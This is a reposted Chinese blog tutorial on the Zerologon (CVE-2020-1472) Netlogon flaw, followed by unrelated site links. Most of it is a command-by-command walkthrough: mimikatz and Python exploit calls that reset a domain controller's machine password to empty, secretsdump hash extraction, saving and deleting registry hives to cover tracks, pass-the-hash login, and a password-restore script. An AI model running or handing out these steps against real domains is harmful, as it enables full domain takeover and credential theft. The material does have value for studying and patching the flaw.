域渗透之Zerologon域提权漏洞

域渗透之Zerologon域提权漏洞组件概述Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之Zerologon域提权漏洞

组件概述

Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。Netlogon远程协议RPC接口还用于为备份域控制器(BDC)复制数据库。

Netlogon远程协议用于维护从域成员到域控制器(DC),域的DC之间以及跨域的DC之间的域关系。此RPC接口用于发现和管理这些关系。

漏洞概述

该漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。

漏洞范围

Microsoft Windows Server 2008 R2 SP1

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

Microsoft Windows Server 2019

Microsoft Windows Server version 2004 (Server Core Installation)

Microsoft Windows Server version 1903 (Server Core Installation)

Microsoft Windows Server version 1909 (Server Core Installation)

影响Windows Server 2008R 2至Windows Server 2019的多个版本系统

漏洞复现

privilege::debug

# 检测是否存在漏洞
lsadump::zerologon /target:<dc-ip> /account:<主机名>$

# 重置密码
lsadump::zerologon /target:<dc-ip> /account:<主机名>$ /exploit

或使用脚本

python3 cve-2020-1472-exploit.py -n server2012 -t 10.211.55.12

-n指定域控计算机主机名

-t指定域控ip

运行exp,确定把域控机器账户密码置换成空

完成后使用

python secretsdump.py 域名/ADD-DC$@192.168.11.15 -no-pass

拖hash,获取域管hash后使用psexec等进行pth登录

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

# 获取文件路径
get system.saveget sam.save
get security.save 

# 删除文件
del /f system.save
del /f sam.save
del /f security.save

解密本地凭据

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

域渗透之Zerologon域提权漏洞

$MACHINE.ACC: 的值,然后使用reinstall_original_pw.py进行还原凭据

python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca

机器名可通过nslookup 或nbtscan等netbios扫描获取

参考

CVE-2020-1472 Netlogon权限提升漏洞分析

CVE-2020-1472 Zerologon

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119829.html原文链接:https://javaforall.net

(0)
上一篇 2021年12月13日 下午5:00
下一篇 2021年12月13日 下午6:00


相关推荐

  • No MyBatis mapper was found in ‘[com.supergo]‘ package. Please check your configuration.问题

    No MyBatis mapper was found in ‘[com.supergo]‘ package. Please check your configuration.问题NoMyBatismapperwasfoundin‘[com.supergo]’package.Pleasecheckyourconfiguration.问题第一遍编写程序运行的时候没问题,第二遍的时候遇到了这个问题。使用的tk的开源项目进行mybatis集成,百度了很多解决方案,最终看到一位前辈介绍:doScan()会扫描启动类同级目录下的mapper接口,但是合理的目录结果绝对不允许所有的mapper都在启动类目录下,所以在启动类目录下添加了一个伪mapper,如下:然后再

    2022年6月25日
    36
  • WineQQ_wine官网

    WineQQ_wine官网https://phpcj.org/wineqq/(转发备注:实测可用,安装完后把windows下的字体拷贝到/home/xxx/.wine/drive_c/windows/Fonts即可无乱码,作者持续更新,可关注上面的原链接)最后更新日期:2018年5月5日[20180505]1、QQ升级为小俊的9.0.3_23719。[20180420]1、QQ升级为小俊的9.0.2_23475。[2018…

    2025年9月22日
    8
  • URL 规范 整理

    URL 规范 整理

    2022年3月5日
    57
  • xshell安装python库_xshell安装jdk

    xshell安装python库_xshell安装jdkxshell安装python下载需要的python.tgz包。https://www.python.org/把下载好的包上传到xshell中,然后解压。tar-zxvfPython-3.6.6.tgz编译安装,进入python文件夹cdPython-3.6.6,执行命令进行编译./configure–prefix=/usr/local/python36//默认安装在/usr/local下make#相当于把源码包里面的代码编译成linux服务器可以识别的代码

    2025年10月12日
    7
  • python json.loads 中文_Python 的完美 json loads

    python json.loads 中文_Python 的完美 json loads为了对付表单提交时参数多和json结构复杂的情况,我写了一个名为recursive_json_loads的处理函数来对请求对象递归调用json.loads()以期能够一次性将所有参数转化为更好用的Python类型。后来又发现了web.py的Storage对象,使这个函数越发好用起来。lang:pythonimportsimplejsonasjsondefrecurs…

    2025年6月16日
    7
  • grok2api:将Grok转换为免费API进行聊天和图像生成

    grok2api:将Grok转换为免费API进行聊天和图像生成

    2026年3月15日
    2

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号